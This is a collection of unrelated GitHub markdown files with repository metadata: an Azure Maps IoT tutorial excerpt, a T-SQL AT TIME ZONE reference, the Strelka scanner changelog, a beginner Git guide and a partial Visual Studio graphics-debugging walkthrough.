3. Zorg ervoor dat .NET Core op je computer is geïnstalleerd. Ga in uw lokale terminalvenster naar de hoofdmap van het C#-project en voer de volgende opdracht uit om de vereiste pakketten voor gesimuleerde apparaattoepassing te installeren:
```cmd/sh
dotnet restore
```
4. Voer in dezelfde terminal de volgende opdracht uit om de simulatietoepassing voor huurauto's te bouwen en uit te voeren:
```cmd/sh
dotnet run
```
Je lokale terminal zou er als volgt uit moeten zien.
:::image type="content" source="./media/tutorial-iot-hub-maps/terminal.png" alt-text="Schermopname van terminaluitvoer.":::
Als u nu de blobopslagcontainer opent, ziet u vier blobs voor locaties waar het voertuig zich buiten de geofence bevond.
:::image type="content" source="./media/tutorial-iot-hub-maps/blob.png" alt-text="Schermopname van blobs in een container weergeven.":::
Op de volgende kaart worden vier locatiepunten van het voertuig weergegeven die buiten de geofence vallen. Elke locatie is met regelmatige tijdsintervallen geregistreerd.
:::image type="content" source="./media/tutorial-iot-hub-maps/violation-map.png" alt-text="Schermopname van kaart met schendingen.":::
## <a name="explore-azure-maps-and-iot"></a>Azure Maps en IoT verkennen
Ga voor meer informatie over het verkennen van de Azure Maps API's die in deze zelfstudie worden gebruikt naar:
* [Zoekadres omkeren](/rest/api/maps/search/getsearchaddressreverse)
* [Geofence downloaden](/rest/api/maps/spatial/getgeofence)
Voor een volledige lijst van Azure Maps REST API's, bekijk:
* [Azure Maps REST API's](/rest/api/maps/spatial/getgeofence)
* [IoT Plug and Play](../iot-pnp/index.yml)
Voor een lijst met apparaten die Azure-gecertificeerd zijn voor IoT ga je naar:
* [Azure-gecertificeerde apparaten](https://catalog.azureiotsolutions.com/)
## <a name="next-steps"></a>Volgende stappen
Ga voor meer informatie over het verzenden van apparaat-naar-cloud-telemetrie en omgekeerd naar:
> [!div class="nextstepaction"]
> [Telemetrie verzenden vanaf een apparaat](../iot-hub/quickstart-send-telemetry-dotnet.md) | 78.712329 | 708 | 0.77145 | nld_Latn | 0.998077 |
9a5f66bec44fb651b528fce071e60febe17ec825 | 229 | md | Markdown | results/3-general/README.md | rembik/faasdom | c95c3b5b496725d27eafbf7134c92c89c1e28571 | [
"Apache-2.0"
] | 12 | 2020-07-02T19:31:39.000Z | 2022-02-15T21:14:24.000Z | results/3-general/README.md | rembik/faasdom | c95c3b5b496725d27eafbf7134c92c89c1e28571 | [
"Apache-2.0"
] | null | null | null | results/3-general/README.md | rembik/faasdom | c95c3b5b496725d27eafbf7134c92c89c1e28571 | [
"Apache-2.0"
] | 6 | 2020-07-09T13:40:22.000Z | 2021-11-19T21:39:45.000Z | ## About
The general test was performed with this application.
The results will be exported from the InfluxDB with this [export_from_InfluxDB.sh](export_from_InfluxDB.sh) and saved to this [raw_DB_export.csv](raw_DB_export.csv) | 45.8 | 164 | 0.816594 | eng_Latn | 0.990307 |
9a5fc10d8cb70cd7833239574b9dbb1196beabc3 | 8,055 | md | Markdown | docs/t-sql/queries/at-time-zone-transact-sql.md | zelanko/sql-docs.de-de | 16c23f852738744f691dbc66fb5057c4eb907a95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/t-sql/queries/at-time-zone-transact-sql.md | zelanko/sql-docs.de-de | 16c23f852738744f691dbc66fb5057c4eb907a95 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/t-sql/queries/at-time-zone-transact-sql.md | zelanko/sql-docs.de-de | 16c23f852738744f691dbc66fb5057c4eb907a95 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-12-30T12:52:58.000Z | 2020-12-30T12:52:58.000Z | ---
description: AT TIME ZONE (Transact-SQL)
title: AT TIME ZONE (Transact-SQL)
ms.date: 06/11/2019
ms.prod: sql
ms.prod_service: database-engine, sql-database
ms.reviewer: ''
ms.custom: ''
ms.technology: t-sql
ms.topic: language-reference
f1_keywords:
- AT TIME ZONE
- AT_TIME_ZONE_TSQL
helpviewer_keywords:
- AT TIME ZONE function
ms.assetid: 311f682f-7f1b-43b6-9ea0-24e36b64f73a
author: VanMSFT
ms.author: vanto
monikerRange: = azuresqldb-current||=azure-sqldw-latest||>= sql-server-2016||>= sql-server-linux-2017
ms.openlocfilehash: 8071dbcced9121cef361c2ceb76589a280ca344f
ms.sourcegitcommit: 1a544cf4dd2720b124c3697d1e62ae7741db757c
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 12/14/2020
ms.locfileid: "97460883"
---
# <a name="at-time-zone-transact-sql"></a>AT TIME ZONE (Transact-SQL)
[!INCLUDE [sqlserver2016-asdb-asdbmi-asa](../../includes/applies-to-version/sqlserver2016-asdb-asdbmi-asa.md)]
Konvertiert einen *inputdate*-Wert in den entsprechenden *datetimeoffset*-Wert in der Zielzeitzone. Wenn *inputdate* ohne Offsetinformationen bereitgestellt wird, wendet die Funktion den Zeitzonenoffset an und setzt dabei voraus, dass der Wert von *inputdate* sich in der Zielzeitzone befindet. Wenn *inputdate* als *datetimeoffset*-Wert bereitgestellt wird, konvertiert die **AT TIME ZONE**-Klausel den Wert mithilfe der Umrechnungsregeln der Zielzeitzone in die Zielzeitzone.
Die Implementierung von **AT TIME ZONE** hängt von einem Windows-Mechanismus zum Umrechnen von **datetime**-Werten in verschiedene Zeitzonen ab.
 [Transact-SQL-Syntaxkonventionen](../../t-sql/language-elements/transact-sql-syntax-conventions-transact-sql.md)
## <a name="syntax"></a>Syntax
```syntaxsql
inputdate AT TIME ZONE timezone
```
## <a name="arguments"></a>Argumente
*inputdate*
Ein Ausdruck, der in einen der folgenden Werte aufgelöst werden kann: **smalldatetime**, **datetime**, **datetime2** oder **datetimeoffset**.
*timezone*: Der Name der Zielzeitzone. [!INCLUDE[ssNoVersion](../../includes/ssnoversion-md.md)] basiert auf in der Windows-Registrierung gespeicherten Zeitzonen. Auf dem Computer installierte Zeitzonen werden in der folgenden Registrierungsstruktur gespeichert: **KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones**. Eine Liste der installierten Zeitzonen wird auch über die [sys.time_zone_info (Transact-SQL)](../../relational-databases/system-catalog-views/sys-time-zone-info-transact-sql.md)-Sicht angezeigt.
## <a name="return-types"></a>Rückgabetypen
Gibt den Datentyp von **datetimeoffset** zurück.
## <a name="return-value"></a>Rückgabewert
Der **datetimeoffset**-Wert in der Zielzeitzone.
## <a name="remarks"></a>Bemerkungen
**AT TIME ZONE** wendet bestimmte Regeln für die Umrechnung von Eingabewerten in die Datentypen **smalldatetime**, **datetime** und **datetime2** an, die in einem Intervall liegen, das durch den Wechsel zur Sommerzeit bestimmt wird:
- Wenn die Uhr vorgestellt wird, entsteht eine Lücke in der Ortszeit, die dem Zeitraum für die Uhrzeitanpassung entspricht. Dieser Zeitraum entspricht in der Regel einer Stunde, kann je nach Zeitzone aber auch 30 oder 45 Minuten entsprechen. Zeitpunkte innerhalb dieser Lücke werden *nach* dem Wechsel zur Sommerzeit mithilfe des Offsets konvertiert.
```sql
/*
Moving to DST in "Central European Standard Time" zone:
offset changes from +01:00 -> +02:00
Change occurred on March 29th, 2015 at 02:00:00.
Adjusted local time became 2015-03-29 03:00:00.
*/
--Time before DST change has standard time offset (+01:00)
SELECT CONVERT(DATETIME2(0), '2015-03-29T01:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-03-29 01:01:00 +01:00
/*
Adjusted time from the "gap interval" (between 02:00 and 03:00)
is moved 1 hour ahead and presented with the summer time offset
(after the DST change)
*/
SELECT CONVERT(DATETIME2(0), '2015-03-29T02:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-03-29 03:01:00 +02:00
--Time after 03:00 is presented with the summer time offset (+02:00)
SELECT CONVERT(DATETIME2(0), '2015-03-29T03:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-03-29 03:01:00 +02:00
```
- Wenn die Uhr wieder zurückgestellt wird, überschneiden sich zwei Stunden der Ortszeit um eine Stunde. In diesem Fall werden Zeitpunkte im Überlappungsintervall mit dem Offset *vor* der Uhrzeitumstellung dargestellt:
```sql
/*
Moving back from DST to standard time in
"Central European Standard Time" zone:
offset changes from +02:00 -> +01:00.
Change occurred on October 25th, 2015 at 03:00:00.
Adjusted local time became 2015-10-25 02:00:00
*/
--Time before the change has DST offset (+02:00)
SELECT CONVERT(DATETIME2(0), '2015-10-25T01:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-10-25 01:01:00 +02:00
/*
Time from the "overlapped interval" is presented with standard time
offset (before the change)
*/
SELECT CONVERT(DATETIME2(0), '2015-10-25T02:00:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-10-25 02:00:00 +02:00
--Time after 03:00 is regularly presented with the standard time offset (+01:00)
SELECT CONVERT(DATETIME2(0), '2015-10-25T03:01:00', 126)
AT TIME ZONE 'Central European Standard Time';
--Result: 2015-10-25 03:01:00 +01:00
```
Da Informationen (wie Zeitzonenregeln) außerhalb von [!INCLUDE[ssNoVersion_md](../../includes/ssnoversion-md.md)] gespeichert und von Zeit zu Zeit geändert werden, wird die **AT TIME ZONE**-Funktion als nicht deterministisch klassifiziert.
## <a name="examples"></a>Beispiele
### <a name="a-add-target-time-zone-offset-to-datetime-without-offset-information"></a>A. Hinzufügen des Zielzeitzonenoffsets zu datetime ohne Offsetinformationen
Verwenden Sie **AT TIME ZONE** zum Hinzufügen des Offsets basierend auf Zeitzonenregeln, wenn Sie wissen, dass die ursprünglichen **datetime**-Werte in derselben Zeitzone bereitgestellt werden:
```sql
USE AdventureWorks2016;
GO
SELECT SalesOrderID, OrderDate,
OrderDate AT TIME ZONE 'Pacific Standard Time' AS OrderDate_TimeZonePST
FROM Sales.SalesOrderHeader;
```
### <a name="b-convert-values-between-different-time-zones"></a>B. Umrechnen von Werten zwischen verschiedenen Zeitzonen
Im folgenden Beispiel werden Werte zwischen verschiedenen Zeitzonen umgerechnet:
```sql
USE AdventureWorks2016;
GO
SELECT SalesOrderID, OrderDate,
OrderDate AT TIME ZONE 'Pacific Standard Time' AS OrderDate_TimeZonePST,
OrderDate AT TIME ZONE 'Central European Standard Time' AS OrderDate_TimeZoneCET
FROM Sales.SalesOrderHeader;
```
### <a name="c-query-temporal-tables-using-a-specific-time-zone"></a>C. Abfragen von temporalen Tabellen mit einer spezifischen Zeitzone
Im folgenden Beispiel werden Daten aus einer temporalen Tabelle der Pacific Standard Time ausgewählt.
```sql
USE AdventureWorks2016;
GO
DECLARE @ASOF datetimeoffset;
SET @ASOF = DATEADD (month, -1, GETDATE()) AT TIME ZONE 'UTC';
-- Query state of the table a month ago projecting period
-- columns as Pacific Standard Time
SELECT BusinessEntityID, PersonType, NameStyle, Title,
FirstName, MiddleName,
ValidFrom AT TIME ZONE 'Pacific Standard Time'
FROM Person.Person_Temporal
FOR SYSTEM_TIME AS OF @ASOF;
```
## <a name="next-steps"></a>Nächste Schritte
- [Datums- und Uhrzeittypen](../../t-sql/data-types/date-and-time-types.md)
- [Date and Time Data Types and Functions (Transact-SQL) (Datums- und Uhrzeitdatentypen und zugehörige Funktionen (Transact-SQL))](../../t-sql/functions/date-and-time-data-types-and-functions-transact-sql.md)
| 44.75 | 546 | 0.736685 | deu_Latn | 0.6485 |
9a604b7c0ab840d7d70608f24b0e0e19c0c2cf31 | 6,458 | md | Markdown | CHANGELOG.md | mambaproject/strelka | 243e6a4c25772a45f550499a1574e97c8aa154dc | [
"Apache-2.0"
] | null | null | null | CHANGELOG.md | mambaproject/strelka | 243e6a4c25772a45f550499a1574e97c8aa154dc | [
"Apache-2.0"
] | null | null | null | CHANGELOG.md | mambaproject/strelka | 243e6a4c25772a45f550499a1574e97c8aa154dc | [
"Apache-2.0"
] | null | null | null | # Changelog
Changes to the project will be tracked in this file via the date of change.
## 2019-12-18
### Added
- Added additional error handling for corrupt documents in ScanDocx
## 2019-12-2
### Changed
- Updated YARA version from 3.10 to 3.11
## 2019-10-26
### Changed
- Removed logging reference in ScanEncryptedDoc
## 2019-10-09
### Changed
- Modified error handling for ScanPlist
### Added
- Added ScanAntiword into backend scanner configuration file (commented out)
## 2019-10-01
### Added
- Added ScanEncryptedDoc which allows users to decrypt documents.
- Added additional error handling for ScanDocx
## 2019-09-30
### Changed
- Modified ScanPE to include additional error handling.
## 2019-09-25
### Added
- Added ScanDoc support for additional metadata extraction.
## 2019-09-19
### Added
- Added support for ScanRar RAR extraction with passwords.
## 2019-09-18
### Added
- Added olecf flavor to ScanIni default
### Changed
- Fixed bug in ScanTnef where key is not present, an exception is thrown.
## 2019-07-26
### Changed
- Fixed bug in ScanPe when header field is nonexistent (jshlbrd)
## 2019-07-25
### Changed
- Improved speed of ScanZip decryption (jshlbrd)
## 2019-07-24
### Changed
- ScanMmbot fields are now internally consistent with other event dictionaries (jshlbrd)
- Fixed bug in ScanMacho dynamic symbols (jshlbrd)
- Renamed 'decompressed_size' to 'size' across all decompression scanners (jshlbrd)
## 2019-07-12
### Added
- Two new fields in ScanIni (comments and sections) (jshlbrd)
- New scanner ScanZlib can decompress Zlib files (jshlbrd)
### Changed
- Fixed unintended CRC exception when decrypting ZIP files (jshlbrd)
## 2019-07-11
### Added
- New scanner ScanIni can parse INI files (jshlbrd)
## 2019-07-09
### Changed
- Renamed strelka-redis to strelka-manager (jshlbrd)
- Updated ScanPe to better sync with ScanElf and ScanMacho (jshlbrd)
## 2019-06-28
### Changed
- Fixed frontend crashing issues when empty files are sent to cluster (jshlbrd)
## 2019-06-27
### Added
- Added Gatekeeper (temporary event cache), a new required component (jshlbrd)
### Changed
- Transitioned ScanMacho from macholibre to LIEF (jshlbrd)
- Fixed multiple issues in ScanElf JSON dictionary (jshlbrd)
## 2019-06-25
### Changed
- Transitioned ScanElf from pyelftools to LIEF (jshlbrd)
- Fixed ScanPdf f-string flags (jshlbrd)
## 2019-06-24
### Changed
- scan_* dictionaries are now nested under scan: {} (jshlbrd)
- 'time' field is now 'request.time' (jshlbrd)
- 'file.scanners_list' is now 'file.scanners' (jshlbrd)
## 2019-06-21
### Changed
- Updated YAML files to use 2 spaces instead of 4 spaces (jshlbrd)
- Conflicting variable names were refactored (jshlbrd)
- Added .env file for cleaner execution of docker-compose (jshlbrd)
## 2019-06-11
### Changed
- go-redis Z commands changed to non-literal (jshlbrd)
## 2019-05-24
### Added
- 'throughput' section added to fileshot and filestream configuration files (jshlbrd)
- Added default docker-compose DNS hosts to misc/envoy/* configuration templates (jshlbrd)
- Added Docker volume mapping to frontend in default docker-compose (jshlbrd)
### Changed
- Forked pyopenssl replaced with M2Crypto (jshlbrd)
- 'tree' event dictionary is now nested under 'file' event dictionary (jshlbrd)
- Scanner event dictionaries now start with 'scan_' (jshlbrd)
- Timestamps are now unix/epoch (jshlbrd)
- ScanExiftool now outputs 'human readable' data (jshlbrd)
- Looping Redis commands sleep at a consistent interval of 250ms (jshlbrd)
### Removed
- 'cache' is no longer used -- 'coordinator' takes over all Redis tasks (jshlbrd)
## 2019-05-16
### Changed
- Switched pyopenssl to forked package (jshlbrd)
- Archived 0MQ branch (jshlbrd)
- Migrated gRPC to master (jshlbrd)
## 2019-04-22
### Added
- Dockerfile now supports UTC and local time (ufomorme)
## 2019-03-23
### Added
- Scan event start and finish timestamps now support UTC and local time (ufomorme)
## 2019-03-08
### Changed
- Improved YARA tasting signature for email files (DavidJBianco)
- Fixed install path for taste directory (jshlbrd)
## 2019-02-19
### Added
- "beautified" field (bool) to ScanJavascript (jshlbrd)
## 2019-02-14
### Added
- strelka_dirstream.py now supports recursive directory scanning (zachsis)
## 2019-02-07
### Added
- ScanZip now supports decryption via password bruteforcing (ksdahl)
## 2019-02-04
### Added
- Unit tests for ScanPe added (infosec-intern)
## 2019-02-01
### Added
- strelka_dirstream.py now supports moving files after upload (zachsis)
## 2019-01-28
### Added
- Added version info to ScanPe (infosec-intern)
## 2019-01-26
### Changed
- Expanded identification of email files (DavidJBianco)
## 2019-01-16
### Changed
- pip packages now installed via requirements.txt file(s) (infosec-intern)
## 2019-01-03
### Added
- EOF error flag to ScanBzip2 (jshlbrd)
### Changed
- taste_yara now loads files from directories, not a static file (ksdahl)
## 2018-12-12
### Added
- Options for manually setting ZeroMQ TCP reconnections on the task socket (between broker and workers) (jshlbrd)
### Changed
- "request_port" option renamed to "request_socket_port" (jshlbrd)
- "task_port" option renamed to "task_socket_port" (jshlbrd)
## 2018-12-10
### Changed
- strelka_dirstream.py switched from using inotify to directory polling (jshlbrd)
- strelka_dirstream.py supports monitoring multiple directories (jshlbrd)
- extract-strelka.bro will temporarily disable file extraction when the extraction directory reaches a maximum threshold (jshlbrd)
## 2018-11-27
### Added
- New scanner ScanFalconSandbox can send files to CrowdStrike's Falcon Sandbox (ksdahl)
## 2018-10-16
### Added
- New scanner ScanPhp can collect tokenized metadata from PHP files (jshlbrd)
## 2018-10-05
### Added
- New scanner ScanStrings can collect strings from file data (similar to Unix "strings" utility) (jshlbrd)
### Changed
- ScanPdf was unintentionally extracting duplicate streams, but now it is fixed to only extract unique streams (jshlbrd)
## 2018-10-03
### Added
- ScanJavascript now supports deobfuscating JavaScript files before parsing metadata (jshlbrd)
## 2018-09-28
### Added
- ScanUrl now supports user-defined regular expressions that can be called per-file (jshlbrd)
### Changed
- Refactored taste.yara `javascript_file` rule for readability (jshlbrd)
- Removed JavaScript files from ScanUrl in the default strelka.yml (jshlbrd)
## 2018-09-26
### Added
- Project went public!
| 29.221719 | 130 | 0.74791 | eng_Latn | 0.967079 |
9a607e98709229e3cfe4f876c9d960a1dd46efb9 | 4,428 | md | Markdown | README.md | roman79/Introduction-to-Git-and-GitHub | 53674b70a7cee659e1c1363a607c3b7c543834c9 | [
"MIT"
] | 2 | 2017-02-28T16:46:38.000Z | 2017-05-27T10:33:59.000Z | README.md | roman79/Introduction-to-Git-and-GitHub | 53674b70a7cee659e1c1363a607c3b7c543834c9 | [
"MIT"
] | null | null | null | README.md | roman79/Introduction-to-Git-and-GitHub | 53674b70a7cee659e1c1363a607c3b7c543834c9 | [
"MIT"
] | 4 | 2017-02-28T16:46:08.000Z | 2019-04-06T10:24:44.000Z | # Introduction-to-Git-and-GitHub
Git is the most popular distributed version control system.
Git is an open source and it is created by the same people who developed Linux (Linus Torvalds).
Git allows you to track files and file changes in a repository “repo” (folder).
Everything is stored in local repositories on your computer.
Git makes changes and tracks modifications to the files stored in GitHub.
Git synchronize repository and code between different people.
GitHub is version control repository and Internet hosting service.
It is store repos and files online. It is like Dropbox for Git repos.
Git and GitHub help to create and manage projects, and more importantly, they allow team members to change and collaborate on the projects.
Links:
* [Link to Git] (https://git-scm.com/)
* [Link to Github] (https://github.com/)
* [Link to Pro Git book(including Git Basics)] (https://git-scm.com/book/en/v2/)
## Download and install Git.
* [Link to Git Windows] (http://git-scm.com/download/win) follow default settings
* **Linux (Debian) - Command** sudo apt-get install git
Open Git Bash (Windows)
cd Desktop
mkdir GitWD
cd GitWD/
======
cd Desktop/GitWD/yourClonedRepo
======
**git status --help** To get help on a particular git command
## Setup git on your computer
**git config --global user.name "your name"**
**git config --global user.email "example@gmail.com"**
**git config --list**
Note! You will need to use the same email address for Git and GitHub.

## Git commands
The **git init** command creates a new Git repository.
The **git clone url or path** copies an existing Git repository. (This can either be a repository stored locally on your computer, or one that exists remotely on the GitHub website).
The **git add .** command tells Git to add all file to a temporary "staging area".
The **git commit -m "updated"** tells Git to save a snapshot of your files that are currently in the staging area.
Once you have committed your changes, Git will add that snapshot to its history.
In future you can revert your code to that particular point in time.
The **git push origin master** send all commited changes to remote repository - GitHub.
The **git status** command tells you a useful summary of the current status of your repository.
The **git log** command will show you a list of all those commits, with a unique ID, a timestamp and a message.
The **git diff** will show you a list of all the changes that you have made in your files - compared to the version that you last committed to Git.
The **git pull** retrives changes from remote repository
## Setup GitHub account
Sign up or sign in, if you have existing account.
* [Link to GitHub] (https://github.com/)
## Star, Fork and Clone or Download buttons
* If you like the repo, you can click **Star** button. The repo will be filtered by star in your GitHub.
* The **Fork** button allows you to copy and save repo to your GitHub. This will allow you to contribute with others on that repository.
* **Clone or Download** button will allows you to clone URL or download zip file.
## Practice exercise 1 Create your first repo in GitHub
Public is a default and it is free but the content of the repo is available to everyone.
It is better to add README.md file.
[My solution to exercise 1](exercises/SolutionToExercise1.txt)
## Markdown is a way to style text on the web.
* [Link to Mastering markdown] (https://guides.github.com/features/mastering-markdown/)
* [Link to Markdown-Cheatsheet] (https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)
## Practice exercise 2 Update your repo
Clone your repo to your computer.
Update README.md locally and push to your remore repository (GitHub).
You do not need to initialize repo **git init** if you cloned the repo to your computer. If you just started Git follow the below commands
[My solution to exercise 2](exercises/SolutionToExercise2.txt)
## Practice exercise 3 Update and add files to your repo
Update your README.md and add files and folders to your local repository and push to your remote repository (GitHub).
[My solution to exercise 3](exercises/SolutionToExercise3.txt)
##
**To remove repository from GitHub** > Settings > Delete this repository > Type repository name
##
If you find any typos please let me know. Thanks
| 30.965035 | 183 | 0.74187 | eng_Latn | 0.996757 |
9a60ed04a22e047f48fb54601f0058be694739b7 | 13,496 | md | Markdown | docs/vs-2015/debugger/walkthrough-missing-objects-due-to-misconfigured-pipeline.md | jcarmon4/visualstudio-docs.es-es | 2f133c9f0a90eb92429dcca0573a0b3f458cdcf3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/debugger/walkthrough-missing-objects-due-to-misconfigured-pipeline.md | jcarmon4/visualstudio-docs.es-es | 2f133c9f0a90eb92429dcca0573a0b3f458cdcf3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/vs-2015/debugger/walkthrough-missing-objects-due-to-misconfigured-pipeline.md | jcarmon4/visualstudio-docs.es-es | 2f133c9f0a90eb92429dcca0573a0b3f458cdcf3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Tutorial: Objetos ausentes debido al canalización mal configurada | Documentos de Microsoft'
ms.date: 11/15/2016
ms.prod: visual-studio-dev14
ms.technology: vs-ide-debug
ms.topic: conceptual
ms.assetid: ed8ac02d-b38f-4055-82fb-67757c2ccbb9
caps.latest.revision: 16
author: MikeJo5000
ms.author: mikejo
manager: jillfra
ms.openlocfilehash: 9d74006051fd39043de75cec81fdad3f1083adef
ms.sourcegitcommit: 47eeeeadd84c879636e9d48747b615de69384356
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 04/23/2019
ms.locfileid: "63444284"
---
# <a name="walkthrough-missing-objects-due-to-misconfigured-pipeline"></a>Tutorial: Objetos ausentes debido a una canalización mal configurada
[!INCLUDE[vs2017banner](../includes/vs2017banner.md)]
En este tutorial se muestra cómo usar las herramientas de diagnóstico de gráficos [!INCLUDE[vsprvs](../includes/vsprvs-md.md)] para investigar un objeto que falta como consecuencia de un sombreador de píxeles sin establecer.
En el tutorial se muestran las tareas siguientes:
- Uso de la **Lista de eventos gráficos** para buscar los posibles orígenes del problema.
- Uso de la ventana **Etapas de canalización de gráficos** para examinar el efecto de la llamada API de Direct3D `DrawIndexed` .
- Inspección del contexto del dispositivo para confirmar que no se estableció una etapa de sombreador.
- Uso de la ventana **Etapas de canalización de gráficos** junto con la **Pila de llamadas de eventos gráficos** para ayudar a encontrar el origen del sombreador de píxeles sin establecer.
## <a name="scenario"></a>Escenario
Cuando falta un objeto en una aplicación 3D, a veces se debe a que no se establece una de las etapas del sombreador antes de que se represente el objeto. En el caso de las aplicaciones que tienen necesidades de representación sencillas, el origen de este error se encuentra normalmente en algún lugar de la pila de llamadas de la llamada a draw del objeto. Sin embargo, como optimización, algunas aplicaciones procesan juntos objetos con programas de sombreador, texturas u otros datos en común para minimizar la sobrecarga del cambio de estado. En estas aplicaciones, el origen del error se podría incluir en el sistema de procesamiento por lotes, en lugar de encontrarse en la pila de llamadas de la llamada a draw. En el escenario de este tutorial se muestra una aplicación con necesidades de representación sencillas y, por tanto, el origen del error se puede encontrar en la pila de llamadas.
En este escenario, cuando se ejecute la aplicación para probarla, se representará el fondo de la manera prevista, pero no aparecerá uno de los objetos. Con el Diagnóstico de gráficos puede capturar el problema en un registro de gráficos para poder depurar la aplicación. El problema tiene este aspecto en la aplicación:

## <a name="investigation"></a>Investigación
Mediante las herramientas de Diagnóstico de gráficos, puede cargar el documento del registro de gráficos para inspeccionar los fotogramas que se capturaron durante la prueba.
#### <a name="to-examine-a-frame-in-a-graphics-log"></a>Para examinar un fotograma en un registro de gráficos
1. En [!INCLUDE[vsprvs](../includes/vsprvs-md.md)], cargue un documento de registro de gráficos que contenga un fotograma que muestra el objeto que falta. Aparecerá una nueva pestaña de registro de gráficos en [!INCLUDE[vsprvs](../includes/vsprvs-md.md)]. En la parte superior de esta pestaña está la salida del destino de representación del fotograma seleccionado. En la parte inferior está la **Lista de fotogramas**, que muestra cada fotograma capturado como imagen en miniatura.
2. En la **Lista de fotogramas**, seleccione un fotograma que muestre que no aparece el objeto. El destino de representación se actualiza para reflejar el fotograma seleccionado. En este escenario, la pestaña de registro de gráficos tiene el aspecto siguiente:

Después de seleccionar un fotograma en el que se muestre el problema, puede comenzar a diagnosticarlo con la **Lista de eventos gráficos**. La **Lista de eventos gráficos** contiene cada llamada API de Direct3D que se realizó para representar el fotograma activo, como, por ejemplo, para configurar el estado del dispositivo, para crear y actualizar búferes, y para dibujar los objetos que aparecen en el fotograma. Muchos tipos de llamadas (por ejemplo, las llamadas a Draw, Dispatch, Copy o Clear) son interesantes, porque a menudo hay (aunque no siempre) un cambio correspondiente en el destino de representación cuando la aplicación funciona según lo esperado. Las llamadas a draw son especialmente interesantes porque cada una de ellas representa la geometría que representaba la aplicación.
Dado que sabe que el destino de representación no contiene el objeto que falta, sino también que no parece que haya otros errores, puede usar la **Lista de eventos gráficos** junto con la herramienta **Etapas de canalización de gráficos** para determinar que la llamada a draw se corresponda con la geometría del objeto que falta. La ventana **Etapas de canalización de gráficos** muestra la geometría que se envió a cada llamada a draw, independientemente de su efecto en el destino de representación. Conforme se desplaza por las llamadas a draw, las etapas de canalización se actualizan para mostrar la geometría asociada a cada llamada a medida que fluye a través de cada etapa habilitada y la salida de destino se actualiza para mostrar el estado de destino de representación después de que se complete la llamada.
#### <a name="to-find-the-draw-call-for-the-missing-geometry"></a>Para encontrar la llamada a draw para la geometría que falta
1. Abra la ventana **Lista de eventos de gráficos** . En la barra de herramientas **Diagnóstico de gráficos** , elija **Lista de eventos**.
2. Abra la ventana **Etapas de canalización de gráficos** . En la barra de herramientas **Diagnóstico de gráficos** , elija **Etapas de canalización**.
3. A medida que se desplaza por cada llamada a draw en la ventana **Lista de eventos gráficos** , examine la ventana **Etapas de canalización de gráficos** para ver el objeto que falta. Para facilitar esta tarea, escriba "Draw" en el cuadro de **Búsqueda** que está ubicado en la esquina superior derecha de la ventana **Lista de eventos gráficos** . Con esto se filtra la lista para que solo incluya los eventos que tienen la palabra “Draw” en sus títulos.
En la ventana **Etapas de canalización de gráficos** , la etapa **Ensamblador de entrada** muestra la geometría del objeto antes de que se transforme y la etapa **Sombreador de vértices** muestra el mismo objeto después de que se transforme. En este escenario, observe que en la ventana **Etapas de canalización de gráficos** se muestran las etapas **Ensamblador de entrada** y **Sombreador de vértices** , pero no la etapa **Sombreador de píxeles** para una de las llamadas a draw.
> [!NOTE]
> Si otras etapas de canalización (por ejemplo, las etapas del sombreador de casco, del sombreador de dominios o del sombreador de geometría) procesan el objeto, cualquiera de ellas podría ser la causa del problema. Normalmente, el problema está relacionado con la primera etapa en la que no se muestra el resultado o se muestra de forma inesperada.
4. Deténgase cuando llegue a la llamada a draw que se corresponde con el objeto que falta. En este escenario, en la ventana **Etapas de canalización de gráficos** se indica que la geometría se emitió a la GPU (que se indica por la presencia de la etapa **Ensamblador de entrada** ) y que se transformó (que se indica por la etapa **Sombreador de vértices** ), pero no aparece en el destino de representación porque no parece ser un sombreador de píxeles activo (que se indica por la ausencia de la etapa **Sombreador de píxeles** ). En este escenario, incluso puede ver la silueta del objeto que falta en la etapa **Fusión de salida** :

Después de confirmar que la aplicación emitió una llamada a draw para la geometría del objeto que falta y detectar que la fase del sombreador de píxeles estaba inactiva, puede examinar el estado del dispositivo para confirmar sus conclusiones. Puede usar la **Tabla de objetos gráficos** para examinar el contexto del dispositivo y otros datos de objetos de Direct3D.
#### <a name="to-examine-device-context"></a>Para examinar el contexto del dispositivo
1. Abra el **contexto del dispositivo d3d11**. En la ventana **Etapas de canalización de gráficos** , elija el vínculo **ID3D11DeviceContext** que forma parte de la llamada `DrawIndexed` que se muestra en la parte superior de la ventana.
2. Examine el estado del dispositivo que se muestra en el **contexto del dispositivo d3d11** para confirmar que no había ningún sombreador de píxeles activo durante la llamada a draw. En este escenario, la **información general del sombreador**, que aparece debajo del **estado del sombreador de píxeles**, indica que el sombreador es **NULL**:

Después de confirmar que su aplicación estableció en NULL el sombreador de píxeles, el siguiente paso será encontrar la ubicación en el código fuente de la aplicación donde se establece el sombreador. Puede usar la **Lista de eventos gráficos** junto con la **Pila de llamadas de eventos gráficos** para encontrar esta ubicación.
#### <a name="to-find-where-the-pixel-shader-is-set-in-your-apps-source-code"></a>Para encontrar el lugar donde se establece el sombreador de píxeles en el código fuente de la aplicación
1. Encuentre la llamada `PSSetShader` que se corresponde con el objeto que falta. En la ventana **Lista de eventos gráficos** , escriba "Draw;PSSetShader" en el cuadro de **Búsqueda** que se encuentra en la esquina superior derecha de la ventana **Lista de eventos gráficos** . Con esto se filtra la lista para que solo incluya los eventos "PSSetShader" y los eventos que tienen la palabra "Draw" en sus títulos. Elija la primera llamada `PSSetShader` que aparece antes de la llamada a draw del objeto que falta.
> [!NOTE]
